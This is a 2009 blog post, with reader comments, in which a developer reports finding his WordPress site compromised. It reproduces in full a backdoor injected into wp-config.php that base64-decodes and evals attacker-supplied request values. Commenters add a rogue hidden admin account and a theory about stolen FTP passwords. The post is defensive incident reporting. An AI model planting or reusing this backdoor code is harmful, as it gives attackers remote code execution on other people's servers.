Well, an update worth its salt
September 2nd, 2009 | by Sean |(turns out I have something technical to blog about, after all.)
Well, I haven’t played with WordPress for a while and it turns out I was a few point-releases back. But, I digress.
When I was writing the last post, I noticed that there was some funny syntax at the end of the Permalink. Actually, it said something like base64_encode and $_SERVER["HTTP_EXECCODE"]. For some reason, I saw these and ignored them (in fact, I mentally chalked them up to a weirdness in Safari on Snow Leopard).
I had a bit of dinner, then my brain turned on. I was looking at PHP that got included inline into markup; this was not a browser bug.
After some investigation, I found a spurious new function added to my wp-config.php (below). This, combined with the update to my Permalink format, suggested server (or application) compromise. The offending code (pretty-printed for readability):
function gpc_4663($l4665) {
if (is_array($l4665)) {
foreach($l4665 as $l4663 => $l4664)
$l4665[$l4663] = gpc_4663($l4664);
} else if (is_string($l4665) && substr($l4665,0,4)=="____") {
eval(base64_decode(substr($l4665,4)));
$l4665=null;
}
return $l4665;
}
if(empty($_SERVER))
$_SERVER = $HTTP_SERVER_VARS;
array_map("gpc_4663",$_SERVER);
Arbitrary code injection — through query parameter, no less. Someone could simply go to any page including this file (which is any database-accessing page) and add a Base64-encoded string with code for the PHP interpreter to execute. Great.
I think the worst thing about this compromise is that I have no idea how the attacker did it.
As I said before, I was a few point releases behind on my WordPress installation. Unfortunately, if this was a known attack, I have no way of knowing it. The folks over at WordPress are seemingly tight-lipped as to the nature of their security updates, so if you’ve been compromised along a vector they’ve since fixed, you’re in the dark. Now I’m just wondering if I still have a big open hole in my WordPress installation.
As for the loss of data, my post-incident analysis reveals that the compromiser got nothing. Whew.
Oh well. If you run WordPress, check your installs.
Software Developer, Consultant, and Geek.
6 Responses to “Well, an update worth its salt”
By passer-by on Sep 4, 2009 | Reply
Hi Sean,
I too have been hit by this, on the 2nd Sept 2009.
I’m a bit stunned as like yourself I have no idea how this person has done it. Kudos to the little punk.
I am beginning to think its a WP exploit. I have a part of my website served up from a private area, none of the files there were effected. Everything effected has been in the root wordpress directory. I am using WP 2.6. Maybe time to upgrade.
By benanne on Sep 4, 2009 | Reply
I was running v2.6.3, and the same thing happened to me. At least, the permalink setting was changed. I haven’t found any injected code. To get rid of it, I fixed the permalink setting, but that turned out to be insufficient; closer inspection of my database revealed that there was somehow another user with administrator rights (I’m supposed to be the only one), and his username was set to a bunch of Javascript. Upon discovering this, I manually removed all references to this user from the database (because he wouldn’t show up in the WP admin pages) and upgraded to 2.8.4. I hope that does it, but I’m not sure yet.
I just thought I’d mention it here, because you don’t say anything about suspicious administrator users, so it’s possible that that’s something you have overlooked. Also, there seems to have been an outbreak of this lately, wordpress.org’s support forums are swarming with people reporting the same symptoms.
By Sean on Sep 5, 2009 | Reply
It looks like there are more details (but not many more): http://mashable.com/2009/09/05/wordpress-attack/
By vladimir on Sep 7, 2009 | Reply
I think it is not the WordPress vulnerability issue. Look at this thread
http://www.webdeveloper.com/forum/showthread.php?p=1032611
A lot of none-php clean HTML sites were infected with this gpc_() in the same manner. It is more probably that it uses compromised FTP passwords which stolen from your desktop by some virus which infected your computer.